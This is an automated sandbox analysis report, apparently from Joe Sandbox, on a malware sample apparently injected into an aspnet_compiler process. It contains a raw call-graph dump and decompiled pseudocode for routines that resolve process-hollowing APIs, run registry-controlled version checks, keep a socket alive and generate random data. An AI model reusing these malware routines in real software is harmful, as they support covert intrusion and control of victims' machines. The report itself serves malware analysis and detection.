47597->47603 47599 402efe 47600 402035 11 API calls 
47599->47600 47601 402f0d 47600->47601 47601->47181 47602->47184 47604 4025d0 28 API calls 47603->47604 47605 401f9d 47604->47605 47605->47599 47607 401f6e 47606->47607 47628 402232 47607->47628 47609 401f79 47609->47194 47611 4086e6 47610->47611 47612 402232 11 API calls 47611->47612 47613 408700 47612->47613 47633 404247 47613->47633 47615 40870e 47616 409835 47615->47616 47658 40ae66 47616->47658 47619 401ee9 11 API calls 47620 409866 47619->47620 47620->47215 47621->47210 47663 403202 47622->47663 47624 403002 47667 403242 47624->47667 47627->47215 47629 40228c 47628->47629 47630 40223c 47628->47630 47629->47609 47630->47629 47632 402759 11 API calls std::_Deallocate 47630->47632 47632->47629 47634 402868 22 API calls 47633->47634 47635 40425b 47634->47635 47636 404270 47635->47636 47637 404285 47635->47637 47643 4042bf 22 API calls 47636->47643 47645 4027c6 47637->47645 47640 404279 47644 402c28 22 API calls 47640->47644 47642 404283 47642->47615 47643->47640 47644->47642 47646 4027cf 47645->47646 47647 402831 47646->47647 47648 4027d9 47646->47648 47657 402884 22 API calls std::_Xinvalid_argument 47647->47657 47651 4027e2 47648->47651 47653 4027f5 47648->47653 47656 402aca 28 API calls __EH_prolog 47651->47656 47654 4027f3 47653->47654 47655 402232 11 API calls 47653->47655 47654->47642 47655->47654 47656->47654 47659 409845 47658->47659 47660 40ae6f 47658->47660 47659->47619 47662 40aee6 28 API calls 47660->47662 47662->47659 47664 40320e 47663->47664 47673 4035f8 47664->47673 47666 40321b 47666->47624 47668 40324e 47667->47668 47669 402232 11 API calls 47668->47669 47670 403268 47669->47670 47686 402316 47670->47686 47674 403606 47673->47674 47675 403624 47674->47675 47676 40360c 47674->47676 47678 40363c 47675->47678 47679 40367e 47675->47679 47684 403686 28 API calls 47676->47684 47682 4027c6 28 API calls 47678->47682 47683 403622 47678->47683 47685 402884 22 API calls std::_Xinvalid_argument 47679->47685 47682->47683 47683->47666 47684->47683 47687 
402327 47686->47687 47688 402232 11 API calls 47687->47688 47689 4023a7 47688->47689 47689->47220 47691 404166 47690->47691 47692 402232 11 API calls 47691->47692 47693 404171 47692->47693 47701 40419c 47693->47701 47696 4042dc 47712 404333 47696->47712 47698 4042ea 47699 403242 11 API calls 47698->47699 47700 4042f9 47699->47700 47700->47233 47702 4041a8 47701->47702 47705 4041b9 47702->47705 47704 40417c 47704->47696 47706 4041c9 47705->47706 47707 4041e6 47706->47707 47708 4041cf 47706->47708 47709 4027c6 28 API calls 47707->47709 47710 404247 28 API calls 47708->47710 47711 4041e4 47709->47711 47710->47711 47711->47704 47713 40433f 47712->47713 47716 404351 47713->47716 47715 40434d 47715->47698 47717 40435f 47716->47717 47718 404365 47717->47718 47719 40437e 47717->47719 47782 4034c6 28 API calls 47718->47782 47720 402868 22 API calls 47719->47720 47721 404386 47720->47721 47723 4043f9 47721->47723 47724 40439f 47721->47724 47783 402884 22 API calls std::_Xinvalid_argument 47723->47783 47726 4027c6 28 API calls 47724->47726 47736 40437c 47724->47736 47726->47736 47736->47715 47782->47736 47784->47247 47786 40ae86 47785->47786 47787 402232 11 API calls 47786->47787 47788 40ae91 47787->47788 47791 40aea6 47788->47791 47790 40aea0 47790->47257 47792 40aee0 47791->47792 47793 40aeb2 47791->47793 47798 402884 22 API calls std::_Xinvalid_argument 47792->47798 47795 4027c6 28 API calls 47793->47795 47797 40aebc 47795->47797 47797->47790 47805 43939a 47799->47805 47803 412b77 RegSetValueExA RegCloseKey 47802->47803 47804 412ba1 47802->47804 47803->47804 47804->47265 47808 43931b 47805->47808 47807 4016ed 47807->47267 47809 43932a 47808->47809 47810 43933e 47808->47810 47814 43eead 20 API calls __dosmaperr 47809->47814 47813 43932f pre_c_initialization __alldvrm 47810->47813 47815 4471d7 11 API calls 2 library calls 47810->47815 47813->47807 47814->47813 47815->47813 47819 41a454 _Yarn ___scrt_fastfail 47816->47819 47817 402073 28 API calls 47818 414290 47817->47818 
47818->47274 47819->47817 47820->47291 47822 414249 WSASetLastError 47821->47822 47823 41423f 47821->47823 47822->47318 47995 4140cd 29 API calls ___std_exception_copy 47823->47995 47825 414244 47825->47822 47828 404826 socket 47827->47828 47829 404819 47827->47829 47831 404840 CreateEventW 47828->47831 47832 404822 47828->47832 47996 40487e WSAStartup 47829->47996 47831->47318 47832->47318 47833 40481e 47833->47828 47833->47832 47835 404f45 47834->47835 47840 404fc6 47834->47840 47836 404f4e 47835->47836 47837 404fa0 CreateEventA 47835->47837 47838 404f5d GetLocalTime 47835->47838 47836->47837 47837->47840 47839 41a6e9 28 API calls 47838->47839 47841 404f71 47839->47841 47840->47318 47997 4052dd 28 API calls 47841->47997 47850 4049fb 47849->47850 47851 4048ce 47849->47851 47852 40495e 47850->47852 47853 404a01 WSAGetLastError 47850->47853 47851->47852 47856 4052fe 28 API calls 47851->47856 47872 404903 47851->47872 47852->47318 47853->47852 47854 404a11 47853->47854 47857 404912 47854->47857 47858 404a16 47854->47858 47861 4048ef 47856->47861 47863 402073 28 API calls 47857->47863 47859 41b45a 30 API calls 47858->47859 47862 404a20 47859->47862 47860 40490b 47860->47857 47867 404921 47860->47867 47864 402073 28 API calls 47861->47864 48009 4052dd 28 API calls 47862->48009 47868 404a60 47863->47868 47865 4048fe 47864->47865 47869 41a04a 79 API calls 47865->47869 47874 404930 47867->47874 47875 404967 47867->47875 47871 402073 28 API calls 47868->47871 47869->47872 47876 404a6f 47871->47876 47998 41f56b 27 API calls 47872->47998 47880 402073 28 API calls 47874->47880 48006 42034b 53 API calls 47875->48006 47877 41a04a 79 API calls 47876->47877 47877->47852 47883 40493f 47880->47883 47882 40496f 47885 4049a4 47882->47885 47886 404974 47882->47886 47887 402073 28 API calls 47883->47887 48008 41f711 28 API calls 47885->48008 47890 402073 28 API calls 47886->47890 47891 40494e 47887->47891 47893 404983 47890->47893 47894 41a04a 79 API calls 47891->47894 47892 4049ac 
47896 4049d9 CreateEventW CreateEventW 47892->47896 47898 402073 28 API calls 47892->47898 47897 402073 28 API calls 47893->47897 47895 404953 47894->47895 47999 41f5ab 47895->47999 47896->47852 47899 404992 47897->47899 47901 4049c2 47898->47901 47902 41a04a 79 API calls 47899->47902 47903 402073 28 API calls 47901->47903 47904 404997 47902->47904 47905 4049d1 47903->47905 48007 41f9bd 51 API calls 47904->48007 47907 41a04a 79 API calls 47905->47907 47908 4049d6 47907->47908 47908->47896 48012 41a311 GlobalMemoryStatusEx 47909->48012 47911 41a350 47911->47318 48013 4138c7 47912->48013 47916 44075d 47915->47916 48043 44054d 47916->48043 47918 44077e 47918->47318 47920 40d2a9 47919->47920 47921 4127e7 3 API calls 47920->47921 47923 40d2b0 47921->47923 47922 40d2c8 47922->47318 47923->47922 47924 412831 3 API calls 47923->47924 47924->47922 47926 402097 28 API calls 47925->47926 47927 41a7b2 47926->47927 47927->47318 47929 41a886 47928->47929 47930 402097 28 API calls 47929->47930 47931 41a898 47930->47931 47931->47318 47933 440751 20 API calls 47932->47933 47934 41a70d 47933->47934 47935 402073 28 API calls 47934->47935 47936 41a71b 47935->47936 47936->47318 47938 41a657 GetTickCount 47937->47938 47938->47349 47940 435760 ___scrt_fastfail 47939->47940 47941 41a610 GetForegroundWindow GetWindowTextW 47940->47941 47942 40415e 28 API calls 47941->47942 47943 41a63a 47942->47943 47943->47349 47944->47349 47945->47349 47946->47349 47948 4020bf 11 API calls 47947->47948 47949 404c07 47948->47949 47950 4020bf 11 API calls 47949->47950 47954 404c10 47950->47954 47951 43a620 ___std_exception_copy 21 API calls 47951->47954 47953 404c76 47953->47954 47956 404c81 47953->47956 47954->47951 47954->47953 47955 402097 28 API calls 47954->47955 47957 401fc2 28 API calls 47954->47957 47959 401fb8 11 API calls 47954->47959 48048 404ca3 47954->48048 48061 404b76 56 API calls 47954->48061 47955->47954 47958 404e06 98 API calls 47956->47958 47957->47954 47960 404c88 47958->47960 
47959->47954 47961 401fb8 11 API calls 47960->47961 47962 404c91 47961->47962 47963 401fb8 11 API calls 47962->47963 47964 404c9a 47963->47964 47964->47325 47967 404e20 SetEvent CloseHandle 47966->47967 47968 404e37 closesocket 47966->47968 47969 404eb8 47967->47969 47970 404e44 47968->47970 47969->47318 47971 404e53 47970->47971 47972 404e5a 47970->47972 48062 4050c4 83 API calls 47971->48062 47974 404e6c WaitForSingleObject 47972->47974 47975 404eae SetEvent CloseHandle 47972->47975 47976 41f5ab 3 API calls 47974->47976 47975->47969 47977 404e7b SetEvent WaitForSingleObject 47976->47977 47978 41f5ab 3 API calls 47977->47978 47979 404e93 SetEvent FindCloseChangeNotification FindCloseChangeNotification 47978->47979 47979->47975 47980->47318 47982 4020bf 11 API calls 47981->47982 47983 41b46e FormatMessageA 47982->47983 47984 41b49a 47983->47984 47985 41b48c 47983->47985 47988 41b4a5 LocalFree 47984->47988 47986 402073 28 API calls 47985->47986 47987 41b498 47986->47987 47990 401fb8 11 API calls 47987->47990 47989 402035 11 API calls 47988->47989 47989->47987 47991 41b4c1 47990->47991 47991->47318 47993->47349 47994->47325 47995->47825 47996->47833 47998->47860 48000 41f5b3 47999->48000 48001 41d01c 47999->48001 48000->47852 48002 41d02a 48001->48002 48010 41c166 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48001->48010 48011 41cd4c DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48002->48011 48005 41d031 48006->47882 48007->47895 48008->47892 48010->48002 48011->48005 48012->47911 48016 41389a 48013->48016 48017 4138af ___scrt_initialize_default_local_stdio_options 48016->48017 48020 43e06d 48017->48020 48023 43adc0 48020->48023 48024 43ae00 48023->48024 48025 43ade8 48023->48025 48024->48025 48026 43ae08 48024->48026 48038 43eead 20 API calls __dosmaperr 48025->48038 48039 4390b7 35 API calls 3 library calls 48026->48039 48029 43aded pre_c_initialization 48031 4338bb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 
48029->48031 48030 43ae18 48040 43b546 20 API calls 2 library calls 48030->48040 48033 4138bd 48031->48033 48033->47318 48034 43ae90 48041 43bbb4 50 API calls 3 library calls 48034->48041 48037 43ae9b 48042 43b5b0 20 API calls _free 48037->48042 48038->48029 48039->48030 48040->48034 48041->48037 48042->48029 48044 440564 48043->48044 48046 44059b pre_c_initialization 48044->48046 48047 43eead 20 API calls __dosmaperr 48044->48047 48046->47918 48047->48046 48049 4020bf 11 API calls 48048->48049 48060 404cbe 48049->48060 48050 404df3 48051 401fb8 11 API calls 48050->48051 48052 404dfc 48051->48052 48052->47953 48053 401fc2 28 API calls 48053->48060 48054 401fb8 11 API calls 48054->48060 48055 4020d6 28 API calls 48055->48060 48056 401fa0 28 API calls 48057 404d8d CreateEventA 48056->48057 48058 404dad WaitForSingleObject FindCloseChangeNotification 48057->48058 48058->48060 48059 404182 28 API calls 48059->48060 48060->48050 48060->48053 48060->48054 48060->48055 48060->48056 48060->48059 48061->47954 48062->47972 48063->47393 48064->47420 48065->47419 48066->47408 48067->47412 48068->47418 48069->47449 48074 40ed05 48072->48074 48073 412831 3 API calls 48073->48074 48074->48073 48075 40eda9 48074->48075 48077 40ed99 Sleep 48074->48077 48094 40ed37 48074->48094 48078 4086d0 28 API calls 48075->48078 48076 4086d0 28 API calls 48076->48094 48077->48074 48081 40edb4 48078->48081 48080 41a7b9 28 API calls 48080->48094 48082 41a7b9 28 API calls 48081->48082 48083 40edc0 48082->48083 48101 412afc 14 API calls 48083->48101 48086 401ee9 11 API calls 48086->48094 48087 40edd3 48088 401ee9 11 API calls 48087->48088 48090 40eddf 48088->48090 48089 402073 28 API calls 48089->48094 48091 402073 28 API calls 48090->48091 48092 40edf0 48091->48092 48095 412a57 14 API calls 48092->48095 48093 412a57 14 API calls 48093->48094 48094->48076 48094->48077 48094->48080 48094->48086 48094->48089 48094->48093 48099 40c5a4 111 API calls ___scrt_fastfail 48094->48099 48100 412afc 14 API 
calls 48094->48100 48096 40ee03 48095->48096 48102 411d93 TerminateProcess WaitForSingleObject 48096->48102 48098 40ee0b ExitProcess 48100->48094 48101->48087 48102->48098 48103 4252f1 48104 425306 48103->48104 48107 425398 48103->48107 48106 4253fd 48104->48106 48104->48107 48108 42544f 48104->48108 48110 425388 48104->48110 48112 425428 48104->48112 48113 425353 48104->48113 48118 4253c8 48104->48118 48131 4237e8 48 API calls _Yarn 48104->48131 48106->48112 48135 423ffb 21 API calls 48106->48135 48108->48107 48136 424a60 28 API calls 48108->48136 48110->48107 48110->48118 48133 4237e8 48 API calls _Yarn 48110->48133 48112->48107 48112->48108 48119 4243ec 48112->48119 48113->48107 48113->48110 48132 41e477 51 API calls 48113->48132 48118->48106 48118->48107 48134 41e477 51 API calls 48118->48134 48121 42440b ___scrt_fastfail 48119->48121 48120 42441f 48126 424428 48120->48126 48127 42443f 48120->48127 48139 41c36a 48 API calls 48120->48139 48123 42441a 48121->48123 48121->48127 48137 41d4c6 21 API calls 48121->48137 48123->48120 48123->48127 48138 41eee3 45 API calls 48123->48138 48126->48127 48140 423610 21 API calls 2 library calls 48126->48140 48127->48108 48129 4244c2 48129->48127 48130 4317cf 21 API calls 48129->48130 48130->48120 48131->48113 48132->48113 48133->48118 48134->48118 48135->48112 48136->48107 48137->48123 48138->48129 48139->48126 48140->48127 48141 425556 48146 4255d3 send 48141->48146 48147 409876 48152 409a7a 48147->48152 48155 409a8e ___scrt_fastfail 48152->48155 48153 401e45 22 API calls 48153->48155 48154 40415e 28 API calls 48154->48155 48155->48153 48155->48154 48157 409ad0 Sleep 48155->48157 48167 409add 48155->48167 48170 41aeca GetForegroundWindow GetWindowTextLengthW 48155->48170 48157->48155 48158 4042dc 78 API calls 48158->48167 48159 402ff4 28 API calls 48159->48167 48160 401ef3 28 API calls 48160->48167 48161 401ee9 11 API calls 48161->48167 48162 4086d0 28 API calls 48162->48167 48164 401e45 22 API calls 48164->48167 48165 

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E0041B4C9() {
                    				struct HINSTANCE__* _t1;
                    				_Unknown_base(*)()* _t2;
                    				_Unknown_base(*)()* _t6;
                    				_Unknown_base(*)()* _t10;
                    				_Unknown_base(*)()* _t18;
                    				_Unknown_base(*)()* _t24;
                    				_Unknown_base(*)()* _t30;
                    				_Unknown_base(*)()* _t34;
                    				CHAR* _t42;
                    				CHAR* _t45;
                    				CHAR* _t46;
                    				CHAR* _t47;
                    				CHAR* _t48;
                    				CHAR* _t49;
                    
                    				_t45 = "GetModuleFileNameExA";
                    				_t1 = LoadLibraryA("Psapi.dll"); // executed
                    				_t2 = GetProcAddress(_t1, _t45);
                    				 *0x472b00 = _t2;
                    				if(_t2 == 0) {
                    					 *0x472b00 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t45);
                    				}
                    				_t46 = "GetModuleFileNameExW";
                    				 *0x472af8 = GetProcAddress(LoadLibraryA("Psapi.dll"), _t46);
                    				if( *0x472b00 == 0) {
                    					 *0x472af8 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t46);
                    				}
                    				_t6 = GetProcAddress(GetModuleHandleA("shcore"), "SetProcessDpiAwareness");
                    				 *0x472ad8 = _t6;
                    				if(_t6 == 0) {
                    					 *0x472adc = GetProcAddress(GetModuleHandleA("user32"), "SetProcessDpiAware");
                    				}
                    				GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                    				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                    				_t47 = "kernel32";
                    				 *0x472aec = _t10;
                    				 *0x472af4 = GetProcAddress(GetModuleHandleA(_t47), "IsWow64Process");
                    				 *0x472afc = GetProcAddress(GetModuleHandleA(_t47), "GetComputerNameExW");
                    				 *0x472ae8 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                    				_t18 = GetProcAddress(GetModuleHandleA(_t47), "SetProcessDEPPolicy");
                    				_t48 = "user32";
                    				 *0x472ae0 = _t18;
                    				 *0x472ad0 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayDevicesW");
                    				 *0x472ad4 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayMonitors");
                    				_t24 = GetProcAddress(GetModuleHandleA(_t48), "GetMonitorInfoW");
                    				_t49 = "kernel32.dll";
                    				 *0x472b18 = _t24;
                    				 *0x472b08 = GetProcAddress(GetModuleHandleA(_t49), "GetSystemTimes");
                    				 *0x472b14 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                    				_t30 = GetProcAddress(LoadLibraryA(_t49), "GetConsoleWindow");
                    				_t42 = "ntdll";
                    				 *0x472b0c = _t30;
                    				 *0x472b04 = GetProcAddress(GetModuleHandleA(_t42), "NtSuspendProcess");
                    				_t34 = GetProcAddress(GetModuleHandleA(_t42), "NtResumeProcess");
                    				 *0x472af0 = _t34;
                    				return _t34;
                    			}


















                    APIs
                    • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B501
                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B516
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                    • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B543
                    • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B593
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040DEE5), ref: 0041B5F9
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5FC
                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040DEE5), ref: 0041B60E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B611
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040DEE5), ref: 0041B61F
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B622
                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040DEE5), ref: 0041B62F
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B632
                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040DEE5), ref: 0041B644
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B647
                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040DEE5), ref: 0041B654
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B657
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule$LibraryLoad
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll$ntdll.dll$shcore$user32
                    • API String ID: 551388010-626199206
                    • Opcode ID: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                    • Instruction ID: 5a53dc12768b909e1e2e060ec693a1e80cbb19dbcc6530350e1da79dd032a68e
                    • Opcode Fuzzy Hash: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                    • Instruction Fuzzy Hash: C441EEA0E407187AD620BFB65D49E1B3E9CEA41B547110837B508B3551FAFCA8908F6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 56%
                    			E0040ECEA() {
                    				signed int _v32;
                    				void* _t13;
                    				void* _t22;
                    				char* _t34;
                    				void* _t63;
                    				signed int _t64;
                    				void* _t66;
                    				void* _t67;
                    				void* _t69;
                    
                    				_t66 = (_t64 & 0xfffffff8) - 0x1c;
                    				_t34 = L"pth_unenc";
                    				while(1) {
                    					_v32 = _v32 & 0x00000000;
                    					_t52 = E00401F8B(0x473238); // executed
                    					E00412831(_t10, "override",  &_v32); // executed
                    					_t13 = _v32 - 1;
                    					if(_t13 == 0) {
                    						goto L5;
                    					}
                    					_t22 = _t13 - 1;
                    					if(_t22 == 0) {
                    						_t70 = _t66 - 0x1c;
                    						E004086D0(_t34, _t66 - 0x1c, _t52, __eflags, 0x473220);
                    						_push(_t34);
                    						E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
                    						E00401EE9();
                    						_push(1);
                    						E00402073(_t34, _t70 + 0x20 - 0x18, _t25, _t63, "4.6.0 Pro");
                    						_push("v");
                    						E00412A57(0x473238, E00401F8B(0x473238));
                    						E00411D93();
                    						ExitProcess(0);
                    					}
                    					_t77 = _t22 != 1;
                    					if(_t22 != 1) {
                    						L6:
                    						Sleep(0xbb8); // executed
                    						continue;
                    					}
                    					E0040C5A4();
                    					L5:
                    					_t67 = _t66 - 0x1c;
                    					E004086D0(_t34, _t67, _t52, _t77, 0x473220);
                    					_push(_t34);
                    					E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
                    					E00401EE9();
                    					_push(1);
                    					_t69 = _t67 + 0x20 - 0x18;
                    					E00402073(_t34, _t69, _t16, _t63, "4.6.0 Pro");
                    					_push("v");
                    					E00412A57(0x473238, E00401F8B(0x473238));
                    					_t66 = _t69 + 0x20;
                    					goto L6;
                    				}
                    			}













                    APIs
                      • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                      • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                      • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                    • Sleep.KERNELBASE(00000BB8), ref: 0040ED9E
                    • ExitProcess.KERNEL32 ref: 0040EE0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 2G$4.6.0 Pro$82G$override$pth_unenc
                    • API String ID: 2281282204-2513004603
                    • Opcode ID: b832dd2b5c78ac8d9ddc99e01ae3423e88a5f8e93bb7847c1b73c09c777fd552
                    • Instruction ID: 45cdfc5c20f0b08445f9514382da16a4fbbca6339717cc3b6e195a3b8059c3c5
                    • Opcode Fuzzy Hash: b832dd2b5c78ac8d9ddc99e01ae3423e88a5f8e93bb7847c1b73c09c777fd552
                    • Instruction Fuzzy Hash: 2721DE31B0020127C608B6B79957AAF35999F80708F50447FF809AA2D7EEBD8A5583DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 91%
                    			E00404F31(void* __ecx, intOrPtr _a4, char _a8) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t16;
                    				void* _t21;
                    				intOrPtr _t29;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t31 = __ecx;
                    				if( *((char*)(__ecx + 0x5c)) != 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t29 = _a4;
                    				if(_a8 != 0) {
                    					__eflags =  *0x470d48;
                    					if( *0x470d48 != 0) {
                    						GetLocalTime( &_v20);
                    						_t16 = E0041A6E9(_t21,  &_v44, _t29);
                    						_t34 = _t33 - 0x18;
                    						E004052DD(_t21, _t33 - 0x18, "KeepAlive             | Enabled | Timeout: ", _t32, __eflags, _t16);
                    						E00402073(_t21, _t34 - 0x14, "KeepAlive             | Enabled | Timeout: ", _t32, "i");
                    						E0041A04A(_t21, _t29);
                    						E00401FB8();
                    					}
                    				} else {
                    					 *((char*)(__ecx + 0x7c)) = 1;
                    				}
                    				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
                    				 *((char*)(_t31 + 0x5c)) = 1;
                    				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
                    				CreateThread(0, 0, E00405130, _t31, 0, 0); // executed
                    				return 1;
                    			}














                    APIs
                    • GetLocalTime.KERNEL32(00000001,00472EC8,004734E8,?,?,?,?,00415014,?,00000001), ref: 00404F61
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00472EC8,004734E8,?,?,?,?,00415014,?,00000001), ref: 00404FAD
                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: KeepAlive | Enabled | Timeout: $Cqt
                    • API String ID: 2532271599-1719384028
                    • Opcode ID: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                    • Instruction ID: 81ef762065af47e4dab8e296ef88b7c3b87c262db6361300a2954e924f939db2
                    • Opcode Fuzzy Hash: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                    • Instruction Fuzzy Hash: D711E3719043816AC720AB769C0DE9BBFB89BD6710F04016FF44562282DAB89485CBBA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E00432142(HCRYPTPROV* __ecx, BYTE* __edx) {
                    				int _v12;
                    				int _t2;
                    				void* _t6;
                    				BYTE* _t9;
                    				long** _t10;
                    
                    				_t10 = __ecx;
                    				_t9 = __edx;
                    				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
                    				if(_t2 != 0) {
                    					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
                    						CryptReleaseContext( *_t10, 0);
                    						return 0;
                    					}
                    					_push(0xffffff98);
                    					L2:
                    					_pop(_t6);
                    					return _t6;
                    				}
                    				_push(0xffffff99);
                    				goto L2;
                    			}









                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431DCA,00000034,?,?,00EE6528), ref: 00432154
                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000), ref: 0043216A
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000,0041CB5C), ref: 0043217C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                    • Instruction ID: adb372f61302f159ea37c7bd5427d8c721a4b5411f3f4e54cdc0eebfb1d2689f
